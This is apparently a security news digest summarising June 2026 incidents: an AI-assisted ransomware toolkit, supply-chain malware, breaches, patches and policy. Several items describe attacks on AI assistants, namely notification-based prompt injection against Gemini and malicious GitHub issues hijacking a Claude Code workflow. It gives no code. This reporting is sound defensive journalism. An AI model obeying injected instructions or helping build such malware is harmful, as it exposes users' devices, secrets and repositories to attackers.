Sophos says it found a ransomware attack toolkit in a customer environment that was built with help from AI coding agents and used to hide from security software and map a victim's Windows network. The framework included Cobalt Strike traffic-masking profiles, Telegram-based command and control, a Cloudflare Worker redirector, and Python tools that generated Rust and Go payloads for evasion and execution. Sophos found operator logs referencing a ransom note and organizations listed on a ransomware leak site, indicating criminal use rather than legitimate red-team testing.
Why it matters: This shows AI tools are being used to speed up real ransomware tradecraft, especially defense evasion and internal network discovery. Defenders should review detections for Telegram and Cloudflare-backed command channels, unusual payload loaders, and suspicious Active Directory reconnaissance, and treat AI-assisted malware development as an operational threat rather than a theory.
Sources
SecurityWeek News 2026.06.05 62%
It adds reporting on Microsoft’s tracking of Storm-2697 and The Gentlemen ransomware-as-a-service, including the Go-based encryptor’s self-propagation via scheduled tasks with SYSTEM privileges.
Bill Toulas 2026.06.02 100%
This article appears to be the first tracked report establishing this specific Sophos-documented ransomware toolkit and its AI-assisted development workflow.
Full page
Hola Browser for Windows supply-chain compromise delivered a Monero cryptominer to some users
Malware · Supply Chain · Technology & Software · Consumers & General Public · Cryptocurrency & Blockchain · Hola · Microsoft
Hola says its Windows browser installer was compromised and, in some cases, delivered hidden mining malware to users. AppEsteem certification checks and analysis by Sophos found an undeclared executable, 'me.exe,' installed under the Hola program folder; the binary was unsigned, obfuscated, added a Microsoft Defender exclusion, copied itself as 'HolaMonitorService.exe,' created the 'hola_monitor_svc' Windows service for persistence, and appeared to mine Monero when the PC was idle. Hola said about 0.1% of users were affected and that it rebuilt its distribution pipeline after separately confirming the compromise with Sygnia.
Why it matters: People who installed Hola Browser on Windows may have unknowingly run malware that abuses their computer for cryptocurrency mining and weakens local defenses. Affected users and admins should treat this as urgent: verify installations, look for the named files and service, remove Hola if necessary, and reinstall only from a trusted, verified build.
Sources
SecurityWeek News 2026.06.05 69%
The roundup explicitly notes the Hola Browser miner bundling as one of the week’s notable items, reinforcing that compromise as a tracked security event.
Bill Toulas 2026.06.04 100%
This article establishes a distinct supply-chain attack on Hola Browser for Windows, including malware behavior, limited scope claims, and vendor confirmation of the compromise.
UN World Food Programme investigates breach of Gaza aid registration system exposing data on about 600,000 households
Breaches & Data LeaksSurveillance & PrivacyNonprofits & NGOsConsumers & General PublicWorld Food Programme
The U.N. World Food Programme says attackers accessed personal data submitted by Palestinians seeking food and cash assistance in Gaza. The incident affected the agency's Self-Registration Application used only in Palestine and exposed names, identification numbers, phone numbers, and neighborhood location details; WFP said the breach occurred on May 14, shut down the platform, and is still investigating how the intrusion happened and whether data was further leaked.
Why it matters: This is not just a privacy breach: exposed aid-recipient data in a war zone can put vulnerable civilians at real physical risk. People who registered for assistance may need to watch for phishing, impersonation, or other misuse of their personal details, while aid organizations should review exposure risks and incident response urgently.
Sources
2026.06.05 99%
This is the same underlying incident: the breach of WFP's Gaza self-registration application. The article adds reporting on the public Telegram notices, confirms the exposed data types included names, ID numbers, phone numbers, and location data, notes the platform was suspended for security improvements, and cites reporting that WFP detected the attack on May 14 after a prior warning about vulnerabilities.
2026.06.04 100%
This article establishes a new tracked story by identifying a distinct breach at the World Food Programme's Gaza self-registration platform, including the affected system, exposed data types, and reported scale of about 600,000 households.
DentaQuest breach exposed personal and health-insurance data for about 2.6 million accounts after ShinyHunters leak
Breaches & Data LeaksHealthcareInsuranceConsumers & General PublicDentaQuest
DentaQuest says hackers accessed part of its network, and leaked data reviewed by Have I Been Pwned indicates about 2.6 million accounts were exposed. The company was listed by the ShinyHunters extortion group, which claimed to have stolen more than 234 GB of data and later leaked it publicly; exposed fields reportedly include email addresses, full names, phone numbers, dates of birth, gender, government-issued IDs, and health-insurance information.
Why it matters: This is a major breach affecting customers of one of the largest U.S. dental benefits administrators, and the exposed identity and insurance data can fuel phishing, impersonation, and fraud. Affected people should watch for breach notices, be wary of calls or emails claiming to be from insurers or providers, and monitor accounts and insurance activity.
Sources
Ionut Arghire 2026.06.05 99%
This article covers the same DentaQuest/ShinyHunters breach and adds that SecurityWeek reported the leak size at 234 GB and that DentaQuest confirmed unauthorized access to a limited portion of its network; it also reiterates the affected data types and the approximate 2.6 million account count from Have I Been Pwned.
Bill Toulas 2026.06.04 100%
This article establishes a distinct breach event: DentaQuest confirmed unauthorized network access, and external analysis tied the public leak to 2.6 million exposed records.
Google Chrome 149 security update fixes 429 vulnerabilities, including critical ANGLE and Network bugs
Urgent PatchesZero-Days & CVEsTechnology & SoftwareConsumers & General PublicGoogle
Google released Chrome 149 with fixes for 429 security vulnerabilities, a record-sized browser security update that affects users on Windows, macOS, and Linux. The most severe issue is CVE-2026-10881, a CVSS 9.6 out-of-bounds read/write flaw in the ANGLE graphics engine that could let a remote attacker use a crafted HTML page to escape Chrome’s sandbox and potentially run code on the operating system. Google also fixed critical flaws CVE-2026-10882 in Network and CVE-2026-10883 in ANGLE in versions 149.0.7827.53 for Linux and 149.0.7827.53/54 for Windows and macOS.
Why it matters: Chrome is widely used, so a large set of browser bugs with multiple critical issues can put many users and organizations at risk from malicious websites. Users and administrators should update Chrome promptly across all devices and managed fleets.
Sources
Ionut Arghire 2026.06.05 100%
This article establishes a new tracked story because it covers a distinct Chrome 149 security release, not the previously tracked Chrome 148 update.
White House AI executive order sets 30-day voluntary review window and creates federal AI cybersecurity clearinghouse
Policy & RegulationGovernmentTechnology & SoftwareWhite HouseCISAOffice of Management and BudgetTreasuryOffice of the National Cyber Director
The White House issued a new artificial intelligence executive order that shortens the voluntary federal review period for certain advanced AI models to 30 days after public release and launches an AI cybersecurity clearinghouse. The order says access to designated "covered frontier" models should include confidentiality, cybersecurity, insider-risk, and intellectual-property safeguards, and directs Treasury, the Office of the National Cyber Director, the Cybersecurity and Infrastructure Security Agency, and the Office of Management and Budget to coordinate AI-based vulnerability detection and patch-prioritization efforts.
Why it matters: This matters because it shapes how the U.S. government and major AI companies will handle powerful models that could help find software flaws or affect critical infrastructure security. Organizations that rely on federal guidance, grants, or critical infrastructure partnerships should watch for implementation details and any new reporting, testing, or collaboration expectations.
Sources
SecurityWeek News 2026.06.05 95%
This article is direct follow-up coverage of the same executive order, adding industry reaction and criticism about the order's voluntary structure, likely adoption gaps, and how its benchmarking and clearinghouse provisions may affect AI developers and smaller critical-infrastructure operators.
2026.06.04 41%
The piece provides follow-on implementation detail for the same executive-order rollout, noting that CISA is named as a key agency under the order and is expected to issue a binding operational directive by Friday.
2026.06.04 88%
This article adds implementation details to the same executive-order event, reporting that CISA plans to release a binding operational directive for federal agencies this week and that the directive will cover vulnerability alleviation, vulnerability management, and rollout of AI access to partners.
Associated Press 2026.06.02 96%
This article appears to cover the same executive order, adding that Trump signed it after delaying a prior ceremony, that the review is framed as voluntary for frontier labs, that the NSA director will have a key role in determining which models are reviewed and which trusted partners get access, and that the White House says the process is meant to help secure critical infrastructure and government cyber defenses.
2026.06.02 100%
This article is the announcement of the executive order itself, establishing a new policy story rather than updating a previously tracked specific event.
City of York Council email error exposed hundreds of Blue Badge holders and revealed their disability status
Breaches & Data LeaksSurveillance & PrivacyGovernmentConsumers & General PublicCity of York CouncilInformation Commissioner's Office
City of York Council accidentally exposed the email addresses of hundreds of Blue Badge holders by sending messages without using blind carbon copy (BCC). Because the list was for Blue Badge-related communications, recipients could also infer that others on the list were disabled or had mobility impairments, making the breach especially sensitive. The council said it triggered its breach procedures, warned recipients to watch for suspicious messages, and the UK Information Commissioner's Office said it received a breach report and closed the case with advice.
Why it matters: This is a meaningful privacy breach because it exposed not just contact details but sensitive status information about disabled residents. Affected people should be alert for phishing or harassment, and public-sector organizations should review bulk-email controls and handling of special-category personal data.
Sources
2026.06.05 100%
This article establishes a distinct local-government data breach event involving City of York Council's mistaken disclosure of Blue Badge holders' email addresses and inferred disability status.
Five Eyes warn China is using LinkedIn, Indeed and Upwork to recruit people with access to state secrets
Social Engineering & PhishingThreat Actors & APTsGovernmentDefense & AerospaceTechnology & SoftwareLegal & Professional ServicesCryptocurrency & BlockchainMI5LinkedInIndeedUpworkPayPalWestern Union
MI5 and allied intelligence agencies warned that Chinese intelligence officers and their proxies are using job and networking platforms including LinkedIn, Indeed, and Upwork to spot and cultivate people with access to classified or otherwise sensitive government information. The advisory says the operators pose as recruiters, consultancies, think tanks, or research clients, rank applicants by likely access, request trial reports, then move conversations to encrypted messaging and pay through services such as PayPal, Zelle, Wise, Western Union, or cryptocurrency in exchange for non-public information.
Why it matters: This is a real-world espionage and social-engineering threat aimed at government, defense, foreign-affairs, academic, media, and policy workers. People in or near sensitive roles should treat unsolicited research, consulting, or recruiter outreach on these platforms as potentially hostile, report suspicious contact, and avoid sharing resumes or non-public work details casually.
Sources
Ionut Arghire 2026.06.05 98%
This article is a direct report on the same Five Eyes alert, adding detail on the fake recruiter workflow: impersonated think tanks and HR firms, ranking resumes by likely access, trial reports on defense and trade topics, escalation to requests for privileged information, movement to encrypted messaging, and payment methods including PayPal, Wise, Western Union, and cryptocurrency.
2026.06.04 98%
This article is another report on the same Five Eyes joint bulletin, adding details that Chinese intelligence officers pose as recruiters or consultants for front companies, shift targets from direct LinkedIn outreach to job-ad responses, screen applicants through interviews and trial reports, then move conversations to encrypted messaging apps and pay for increasingly sensitive information.
2026.06.04 100%
The article centers on a newly published MI5/Five Eyes advisory describing the current recruitment tradecraft, platforms used, target groups, and payment methods in China's state-secrets collection campaign.
RCI Hospitality says breach tied to web-server access flaw exposed data on about 40,000 people
Breaches & Data LeaksHospitality & TravelConsumers & General PublicTechnology & SoftwareRCI HospitalityRCI Internet ServicesMicrosoft
RCI Hospitality says a cyberattack exposed sensitive personal data belonging to roughly 40,000 people. The company previously disclosed that its RCI Internet Services subsidiary found an insecure direct object reference, or IDOR, flaw on an IIS web server on March 23 that allowed unauthorized access to personal information, and it later determined files were stolen. Exposed data included names, contact details, dates of birth, Social Security numbers, and driver’s license numbers.
Why it matters: People affected face a real risk of identity theft because the stolen files included high-value personal data. Organizations should review web applications for IDOR-style authorization flaws, and affected individuals should watch for fraud and consider credit monitoring or freezes.
Sources
Eduard Kovacs 2026.06.05 100%
This article appears to be the first clear impact update establishing the RCI Hospitality breach as a trackable story, adding the concrete figure of roughly 40,000 affected individuals and confirming file theft.
Apple removes Russia’s state-backed Max messaging app from the App Store
Information FreedomSurveillance & PrivacyCensorshipGovernmentTechnology & SoftwareConsumers & General PublicAppleVK
Apple removed Russia’s state-backed Max messaging app from the App Store, cutting off new iPhone and iPad downloads and updates for existing users. Apple told BBC Russia the removal was done to comply with sanctions regulations, while Russian officials said about 20 million users lost access through Apple’s marketplace. Max, developed by VK and promoted by the Russian state as a Telegram and WhatsApp alternative, is deeply integrated with government services, digital ID, e-signatures, and payments; critics warn its lack of end-to-end encryption could make user communications easier for authorities to monitor.
Why it matters: This affects Russian users who rely on Max and highlights how app-store controls, sanctions, and state-backed platforms can shape access to communication tools. It also matters for privacy watchers because Max is closely tied to government infrastructure, so users should weigh surveillance risks and loss of updates if they continue using it.
Sources
2026.06.04 100%
This article establishes a new story about Apple’s removal of the Max app as a distinct platform-access and privacy event, not the same underlying event as any listed tracked story.
Pink extortion group uses fake help-desk calls and MFA phishing to steal Microsoft 365 and cloud data
Social Engineering & PhishingScams & FraudThreat Actors & APTsBreaches & Data LeaksMicrosoft
A newly identified extortion group called Pink is calling employees while pretending to be IT support, then stealing account credentials and company data to demand payment. Palo Alto Networks Unit 42 says the group, tracked as CL-CRI-1147 and likely linked to the criminal network known as The Com, uses voice phishing and fake help-desk interactions to capture passwords and multifactor authentication (MFA) approvals, then raids services such as SharePoint, OneDrive, and Microsoft Teams. Unit 42 said Pink's leak site went live on May 31 and published domains and IP addresses tied to the campaign as indicators of compromise.
Why it matters: This matters to organizations that rely on cloud productivity tools because attackers do not need malware or software flaws if they can talk staff into handing over access. Companies should warn staff about unsolicited help-desk calls, tighten help-desk identity checks, review Microsoft 365 logs, and block or investigate the listed phishing infrastructure immediately.
Sources
2026.06.04 100%
The article establishes a distinct new threat story: a newly branded extortion cluster, Pink, with a named leak site, tradecraft, likely affiliation, and concrete indicators of compromise.
Magecart campaign uses Google Tag Manager and Stripe API to steal payment cards from Magento checkout pages
Scams & FraudSocial Engineering & PhishingMalwareRetail & E-CommerceConsumers & General PublicTechnology & SoftwareMagentoAdobeGoogleStripe
Researchers say a new Magecart card-skimming campaign is stealing shoppers’ payment details from compromised online stores and hiding both its malware and stolen data inside trusted Google Tag Manager and Stripe services. Sansec says the skimmer targets Magento and Adobe Commerce checkout pages, pulls JavaScript from a Google Tag Manager container, retrieves payload code from Stripe customer metadata tied to customer ID cus_TfFjAAZQNOYENR, and exfiltrates stolen card, billing, email, and phone data by creating fake Stripe customer records; a variant uses Google Firestore instead of Stripe. The Stripe record was reportedly created on December 24, 2025, suggesting the campaign may have been active for months.
Why it matters: This matters because stores may allow traffic to Google Tag Manager and Stripe by default, letting the skimmer blend in and evade common security controls while stealing card data from real customers. Online retailers using Magento or Adobe Commerce should urgently inspect GTM containers, Stripe API activity, and checkout-page scripts for unauthorized changes.
Sources
Bill Toulas 2026.06.04 100%
This article appears to be the initial report on a distinct Magecart payment-card theft campaign that abuses Stripe and Google Tag Manager as trusted infrastructure, not an update to an existing tracked story.
DHS says it will reshape CISA as workforce and budget cuts raise concerns about U.S. cyber defense capacity
Policy & RegulationGovernmentCISADHSTreasury Department
The Homeland Security secretary said the Trump administration plans to refocus and rebuild CISA even as the agency has lost roughly a third of its staff and faces proposed budget cuts. Secretary Markwayne Mullin told lawmakers CISA now has about 2,200 personnel and likely needs about 2,800, while the White House's fiscal 2027 budget would cut more than $700 million. He also signaled a new nominee to lead CISA and defended assigning Treasury a lead role in an AI vulnerability clearinghouse created by the new executive order.
Why it matters: CISA is the main federal agency that helps defend civilian networks, coordinate with private companies, and warn about major cyber risks, so sharp cuts or mission changes can affect incident response and national cyber preparedness. This matters to defenders, state and local governments, and the public because it signals potential changes in federal cyber support, vulnerability handling, and long-term staffing capacity.
Sources
2026.06.04 84%
This article adds concrete new information to that same broader CISA restructuring event: the Trump administration is considering Palantir CTO Shyam Sankar to fill the long-vacant CISA director role, while DHS says a nomination is imminent and CISA is being tasked with implementing the new AI executive order.
2026.06.03 100%
This article establishes a distinct policy story centered on DHS's stated plan to reshape CISA amid staffing losses, budget reductions, and pending leadership changes, rather than a specific breach or vulnerability event already tracked.
FTC considers changing or dropping privacy order against X over Twitter’s use of 2FA phone numbers and emails for ads
Surveillance & PrivacyPolicy & RegulationGovernmentTechnology & SoftwareMedia & EntertainmentConsumers & General PublicFTCXTwitter
The U.S. Federal Trade Commission is considering whether to modify or set aside a 2022 privacy order against X, formerly Twitter, over the company’s use of account security data for targeted advertising. The original order followed FTC allegations that Twitter collected phone numbers and email addresses for account security, including two-factor authentication (2FA), then used that data for ads in violation of a 2011 privacy order; the case involved more than 140 million users and a $150 million penalty. The FTC has opened a public comment period through July 2, 2026.
Why it matters: This matters to X users because it concerns whether protections imposed after a major misuse of security-related personal data will remain in force. It also matters more broadly because weakening the order could signal reduced privacy enforcement around companies that repurpose security data for advertising.
Sources
2026.06.04 100%
The article establishes a fresh regulatory development: the FTC is actively reconsidering an existing privacy enforcement order against X/Twitter, with potential consequences for user data protections and future privacy enforcement.
Russia moves to label Belarusian Cyber Partisans and Silent Crow as extremist groups after anti-Kremlin cyberattacks
Information FreedomCensorshipPolicy & RegulationThreat Actors & APTsGovernmentTransportation & LogisticsAeroflotRussia Supreme Court
Russia is asking its Supreme Court to ban Belarusian Cyber Partisans and Silent Crow as extremist organizations, a designation that can outlaw their activities, block their websites and channels, and expose associates to criminal penalties. The move follows the groups' claimed attacks on Russian and Belarusian government and infrastructure targets, including the July 2025 Aeroflot disruption that canceled more than 100 flights and allegedly involved data theft and destruction of airline IT systems. No CVE or software flaw is cited; this is a state action tied to politically motivated hacking and online speech.
Why it matters: This matters because Russia is using an extremism label against online groups tied to cyber operations, which can expand censorship and criminalize access to related information channels. People following these groups, especially in Russia, may face blocking or legal risk, while defenders and researchers should watch for knock-on effects on threat visibility and attribution.
Sources
2026.06.04 100%
The article establishes a distinct new story: a formal Russian legal effort to classify two named anti-Kremlin hacking groups as extremist organizations, rather than reporting a previously tracked breach, vulnerability, or malware event.
U.S. Supreme Court upholds FCC fines against AT&T, Verizon and T-Mobile over sharing customers’ phone location data
Surveillance & PrivacyPolicy & RegulationTelecommunicationsGovernmentConsumers & General PublicAT&TVerizonT-MobileSprintFCCU.S. Supreme Court
The U.S. Supreme Court ruled that the FCC lawfully fined major wireless carriers for sharing access to customers’ location data without proper consent. In an 8-1 decision, the Court said the FCC’s forfeiture process did not violate the companies’ jury-trial rights, leaving in place penalties of roughly $47 million for Verizon, $57 million for AT&T, and $92 million for T-Mobile and Sprint. The underlying FCC case alleged the carriers sold location access to aggregators and data brokers and failed to take reasonable steps to protect that sensitive data.
Why it matters: This matters because it reinforces that mobile carriers can be punished for letting precise location data flow to third parties without meaningful consent. It is important for users concerned about surveillance and for companies handling sensitive data, even though there is no immediate patch or user action beyond reviewing privacy choices and carrier practices.
Sources
2026.06.04 100%
This article establishes a new trackable story because it is a fresh Supreme Court ruling that definitively upholds the FCC’s enforcement action over telecom location-data sharing, rather than an update to any existing tracked item.
Cisco patches Cisco Unified CM flaw CVE-2026-20230 that could lead to root access, warns public PoC exists
Urgent PatchesZero-Days & CVEsTechnology & SoftwareTelecommunicationsCisco
Cisco released fixes for a serious security flaw in Cisco Unified Communications Manager and Unified Communications Manager Session Management Edition that could let remote attackers gain a path to full control of affected appliances. The bug, CVE-2026-20230, is a server-side request forgery issue caused by improper validation of certain HTTP requests; on systems with the WebDialer service enabled, an unauthenticated attacker can send crafted requests to write files to the underlying operating system and potentially escalate to root. Cisco fixed it in Unified CM and Unified CM SME 14SU6 and plans to include fixes in 15SU5.
Why it matters: Organizations running affected Cisco call-management systems should check whether WebDialer is enabled and apply updates quickly, especially because proof-of-concept exploit code is already public. Even without confirmed in-the-wild exploitation, the flaw could give attackers a foothold that leads to full device compromise.
Sources
info@thehackernews.com (The Hacker News) 2026.06.04 99%
The article appears to cover the same underlying event: Cisco’s patch release for CVE-2026-20230 in Unified Communications Manager and the fact that proof-of-concept exploit code is publicly available.
Sergiu Gatlan 2026.06.04 99%
This article is the same underlying event: Cisco's disclosure and patching of CVE-2026-20230 in Unified CM, including that public PoC exploit code exists, the flaw affects systems with WebDialer enabled, and admins can disable WebDialer until updating to fixed releases.
Ionut Arghire 2026.06.04 100%
This article establishes a new tracked story by disclosing Cisco's patch release and warning about public exploit code for CVE-2026-20230 in Unified CM/Unified CM SME; it is distinct from the existing Cisco Secure Workload story, which concerns a different product and CVE.
IronWorm malware backdoors 36 npm packages to steal cloud, AI, and developer credentials
Supply ChainMalwareTechnology & SoftwareCryptocurrency & BlockchainnpmOpenAIAnthropicAWS
Attackers uploaded 36 malicious npm packages carrying a new malware strain called IronWorm, putting developers and continuous integration systems at risk if they installed the poisoned versions. JFrog says the Rust-based malware steals 86 environment variables and 20 credential-file types, including AWS, OpenAI, Anthropic, npm, SSH, vault, and crypto-wallet data; it was first linked to the compromised npm account 'asteroiddao' and can self-propagate by abusing stolen npm publishing and Trusted Publishing secrets to push trojanized package updates.
Why it matters: This can spread from one compromised developer or build system into many other packages and organizations, making it a high-priority software supply-chain threat. Developers and defenders should identify any affected package versions, upgrade to clean releases, rotate exposed credentials, review GitHub Actions and npm publishing tokens, and enforce two-factor authentication.
Sources
Bill Toulas 2026.06.04 100%
The article establishes a distinct npm supply-chain incident centered on the newly identified IronWorm malware and a specific set of 36 compromised packages, rather than merely revisiting the earlier Shai-Hulud or other npm package hijacking events.
Claude Code GitHub Action flaw let a malicious GitHub issue take over repositories running the workflow
Supply ChainZero-Days & CVEsTechnology & SoftwareAnthropicGitHub
A flaw in Anthropic's Claude Code GitHub Action could let an attacker use one malicious GitHub issue or comment to hijack affected repositories. The issue affected the GitHub Action integration for Claude Code, where untrusted issue content could be turned into dangerous workflow commands and expose repository secrets or enable unauthorized code changes in automation runs; the article does not provide a CVE in the supplied text.
Why it matters: Projects using the Claude Code GitHub Action may have been exposed to repository takeover through normal issue-tracker interactions, making this a high-priority supply-chain and automation risk. Maintainers should review Anthropic's fix guidance, restrict workflow permissions, rotate exposed secrets, and treat issue-triggered automation as untrusted until patched.
Sources
info@thehackernews.com (The Hacker News) 2026.06.04 100%
This article appears to establish a distinct newly disclosed vulnerability in Anthropic's Claude Code GitHub Action, not the previously tracked Claude Code sandbox bypass or the broader SymJack agent-manipulation research.
Google patched Gemini voice assistant flaw that let messaging notifications inject hidden commands
Zero-Days & CVEsSocial Engineering & PhishingTechnology & SoftwareConsumers & General PublicGoogleWhatsAppSlackZoom
Researchers say attackers could have manipulated Google’s Gemini voice assistant through ordinary message notifications from apps such as WhatsApp, Slack, and SMS. SafeBreach calls the technique “Fake Context Alignment”: hidden instructions embedded in notification content were silently pulled into Gemini’s context when users asked it to read messages aloud, potentially enabling actions such as controlling Google Home devices, starting Zoom calls, sending deceptive messages, and poisoning long-term memory. Google was notified in August 2025 and patched the issue in November 2025 with content-classifier changes.
Why it matters: This matters because it shows how everyday messages could be turned into a hands-free attack path against AI assistants that are connected to calls, messages, and smart-home controls. Users and organizations relying on Gemini should make sure current protections are in place and treat unsolicited messages as a potential trigger for AI-assisted actions.
Sources
Eduard Kovacs 2026.06.04 100%
This article establishes a distinct security story about a notification-based indirect prompt injection flaw in Google Gemini, separate from existing tracked stories about ChatGPT prompt injection, Gemini API key exposure, or other AI model security issues.
Proofpoint says TA4922 is targeting European organizations with new Atlas RAT malware and phishing lures
Threat Actors & APTsMalwareScams & FraudSocial Engineering & PhishingMicrosoftWhatsAppLINE
A Chinese-speaking cybercrime group is using new malware and localized phishing messages to break into organizations in Europe and beyond. Proofpoint says TA4922, linked to activity overlaps with Silver Fox and Void Arachne, has targeted entities in Germany, Italy, the United Kingdom, South Africa, and parts of Southeast Asia since March 2026 using payroll, tax, VAT, invoice, and HR lures sent by email and messaging apps including WhatsApp, LINE, and Microsoft Teams. The campaigns deploy Atlas RAT, RomulusLoader, SilentRunLoader, and Winos4.0/ValleyRAT for remote access, file theft, credential theft, keylogging, screenshots, and webcam or audio capture.
Why it matters: Organizations in the targeted regions should treat this as an active intrusion and phishing threat, especially finance, HR, and compliance teams that may receive convincing local-language messages. Defenders should hunt for the named malware families and remote-management tools, tighten phishing controls, and warn staff to verify unexpected payroll, tax, invoice, or compliance messages across email and chat platforms.
Sources
info@thehackernews.com (The Hacker News) 2026.06.04 96%
This appears to be the same underlying Proofpoint-reported TA4922 campaign, adding that the China-linked actor has expanded phishing targeting to the UK, Germany, Italy, and South Africa and continues to use Atlas RAT with localized lures.
Ionut Arghire 2026.06.04 97%
This article is a direct follow-up on the same TA4922 campaign cluster, adding that Proofpoint now views the actor as operating at the highest campaign tempo in its cybercrime tracking, expanding from Asia into the UK, Germany, Italy, and South Africa, and using HR, payroll, invoicing, customer-service, and out-of-band messaging lures together with Atlas RAT, RomulusLoader, SilentRunLoader, ValleyRAT, and RMM tools such as AnyDesk and SyncFuture.
Bill Toulas 2026.06.03 100%
This article appears to be the first tracked item establishing Proofpoint's reporting on TA4922's expanded European campaigns and its use of the newly identified Atlas RAT and related loaders.
CISA adds actively exploited Adobe Commerce and Magento remote-code-execution flaw CVE-2026-45247 to KEV catalog
Urgent Patches · Zero-Days & CVEs · Retail & E-Commerce · Government · Technology & Software · Adobe · CISA · Magento
CISA says attackers are exploiting a serious Adobe Commerce and Magento flaw that can let them take over vulnerable online store servers. The issue, CVE-2026-45247, is a remote-code-execution vulnerability, meaning an attacker can run their own commands on the target system from afar; CISA added it to the Known Exploited Vulnerabilities catalog, which federal agencies use to prioritize urgent fixes. Affected product and version details are those given in Adobe’s advisory, and internet-exposed commerce systems are the most immediate concern.
Why it matters: Organizations running Adobe Commerce or Magento should treat this as urgent because CISA only adds bugs to KEV when there is evidence of real-world exploitation. For online stores, the risk can include site takeover, payment-data exposure, and malware implantation, so defenders should identify affected instances and patch or mitigate immediately.
Sources
Ionut Arghire 2026.06.04 97%
This article is the same underlying event: active exploitation of CVE-2026-45247 and CISA adding it to KEV. It adds product-specific detail that the flaw is in the Mirasvit Full Page Cache Warmer extension, affects versions before 1.11.12, uses unsafe PHP object deserialization via the CacheWarmer cookie, and includes compromise indicators from Sansec.
info@thehackernews.com (The Hacker News) 2026.06.04 100%
This article appears to establish a new tracked event: CISA's KEV addition for CVE-2026-45247 in Adobe Commerce/Magento, and no existing story in the tracker covers this specific CVE or KEV action.
UK court orders former RAC workers to repay £118,000 after selling crash victims' personal data
Breaches & Data Leaks · Surveillance & Privacy · Policy & Regulation · Transportation & Logistics · Consumers & General Public · RAC · Information Commissioner's Office
Two former RAC employees in the UK were ordered to repay more than £118,000 after illegally selling personal data belonging to car crash victims. The Information Commissioner's Office said the pair were previously convicted under the Computer Misuse Act 1990 and Data Protection Act 2018 after about 29,500 records were copied from RAC systems and shared over WhatsApp with an unknown buyer; one defendant now faces 18 months in prison if she does not repay the proceeds within three months.
Why it matters: This matters because insiders abused access to sensitive data from people involved in road accidents, showing how personal information can be monetized after a breach from inside an organization. For defenders and regulated firms, it underscores the need for monitoring, least-privilege access, and rapid response to suspicious data exports.
Sources
2026.06.04 100%
The article establishes a trackable story by providing a substantive legal outcome in a real insider data-theft case involving RAC crash-victim records and the use of UK privacy and computer-misuse laws to recover criminal proceeds.
DOJ, Thai police and tech firms disrupt 1.4 million scam accounts tied to Southeast Asia fraud compounds
Scams & Fraud · Policy & Regulation · Government · Technology & Software · Telecommunications · Cryptocurrency & Blockchain · Consumers & General Public · DOJ · Royal Thai Police · Apple · Google · Meta · Microsoft
Law enforcement and major tech companies say they disrupted more than 1.4 million accounts and related infrastructure used by scam networks operating from Southeast Asia. The operation, called Disruption Week, involved the US Department of Justice, Royal Thai Police, and firms including Apple, Google, Meta, Microsoft, Coinbase, SpaceX, Silent Push, TRM Labs, and Zenlayer; it led to 63 arrests, the freezing of over $3.8 million in cryptocurrency, and takedowns of social-media accounts, Microsoft accounts, Starlink kits, servers, and malicious network infrastructure linked to fraud compounds in Cambodia, Laos, and Burma.
Why it matters: This matters because the operation targeted industrial-scale scam networks that steal money from victims worldwide and rely on mainstream platforms and connectivity to operate. Users should remain cautious of investment and impersonation scams, while defenders and platforms should watch for follow-on account rebuilds, infrastructure shifts, and related fraud activity.
Sources
Ionut Arghire 2026.06.04 100%
This article establishes a new tracked story around the named 'Disruption Week' crackdown and its specific cross-industry takedown of scam accounts, infrastructure, and crypto assets tied to Southeast Asian fraud compounds.
Espionage hackers spent 150 days inside a senior executive’s email at a major global stock exchange
Malware · Threat Actors & APTs · Breaches & Data Leaks · Finance & Banking · Microsoft · Dropbox
Hackers secretly monitored and stole email data from a senior executive at a major global stock exchange for about five months. Broadcom’s Symantec and Carbon Black teams said the intrusion began in October 2025 and lasted until March 2026, with malware on the victim’s device disguised as Adobe and OneDrive software, scheduled-task persistence masked as Adobe, Lenovo, and OneDrive services, and exfiltration of Outlook mailbox data in small archives via Dropbox and OneDrive. The initial access method and the victim exchange were not disclosed, but investigators published indicators of compromise.
Why it matters: This is a high-impact espionage case because a stock exchange executive’s mailbox can expose market-moving information, internal deliberations, contacts, and travel details. Financial institutions and other high-value targets should hunt for the published indicators, review executive mailbox and endpoint activity, and scrutinize cloud-storage exfiltration and suspicious scheduled tasks.
Sources
info@thehackernews.com (The Hacker News) 2026.06.04 99%
This article is another report on the same underlying incident: an espionage intrusion in which attackers maintained access to a senior executive’s Outlook mailbox at a major global stock exchange for roughly five months.
Eduard Kovacs 2026.06.03 100%
This article appears to be the first tracked report of this specific espionage intrusion against a global stock exchange executive mailbox.
U.S. sanctions Iran’s Nobitex crypto exchange over ransomware- and IRGC-linked transactions
Ransomware · Threat Actors & APTs · Policy & Regulation · Government · Cryptocurrency & Blockchain · Nobitex · OFAC · Wallex · Bitpin · Ramzinex · IRGC
The U.S. sanctioned Nobitex, Iran’s largest cryptocurrency exchange, saying it helped process transactions tied to ransomware actors and Iran’s Islamic Revolutionary Guard Corps. The Treasury’s Office of Foreign Assets Control also designated Nobitex executives and targeted other Iranian exchanges including Wallex, Bitpin, and Ramzinex as part of its "Economic Fury" campaign, alleging sanctions evasion and terrorist-financing support rather than a software flaw or CVE-tracked vulnerability.
Why it matters: This matters because ransomware groups and state-linked actors depend on payment channels to move money, and sanctions can disrupt those routes while raising compliance risk for exchanges, companies, and users who interact with them. Organizations handling crypto exposure should review sanctions screening and watch for links to designated wallets and entities.
Sources
Bill Toulas 2026.06.03 100%
This article establishes a distinct new story about OFAC’s sanctions action against Nobitex and related Iranian exchanges for allegedly facilitating ransomware- and IRGC-linked crypto activity.
Google fixes actively exploited Android zero-day CVE-2025-48595 in June 2026 security update
Urgent Patches · Zero-Days & CVEs · Technology & Software · Consumers & General Public · Google · Qualcomm
Google released Android security updates that fix an actively exploited flaw affecting devices running Android 14 and later. The zero-day, CVE-2025-48595, is a high-severity Android Framework vulnerability that Google says has seen limited targeted exploitation and can let a local attacker achieve code execution and privilege escalation. The June 2026 bulletins also patch 124 vulnerabilities in total, including 18 critical issues across Framework, System, Qualcomm components, and other closed-source and kernel-related parts.
Why it matters: People and organizations using Android devices may be exposed to a flaw already being used in real attacks, even if only in targeted cases. Apply the June 2026 Android security update as soon as your device vendor makes it available, with particular urgency for Pixel users and higher-risk targets.
Sources
Bill Toulas 2026.06.03 98%
This article updates the same underlying event around CVE-2025-48595 by adding that CISA has now placed the Android privilege-escalation flaw in the KEV catalog and set a June 5 remediation deadline for federal agencies.
info@thehackernews.com (The Hacker News) 2026.06.02 97%
This article appears to cover the same June 2026 Android security release, adding that Google patched 124 total flaws in the update while including the actively exploited zero-day CVE-2025-48595.
Eduard Kovacs 2026.06.02 99%
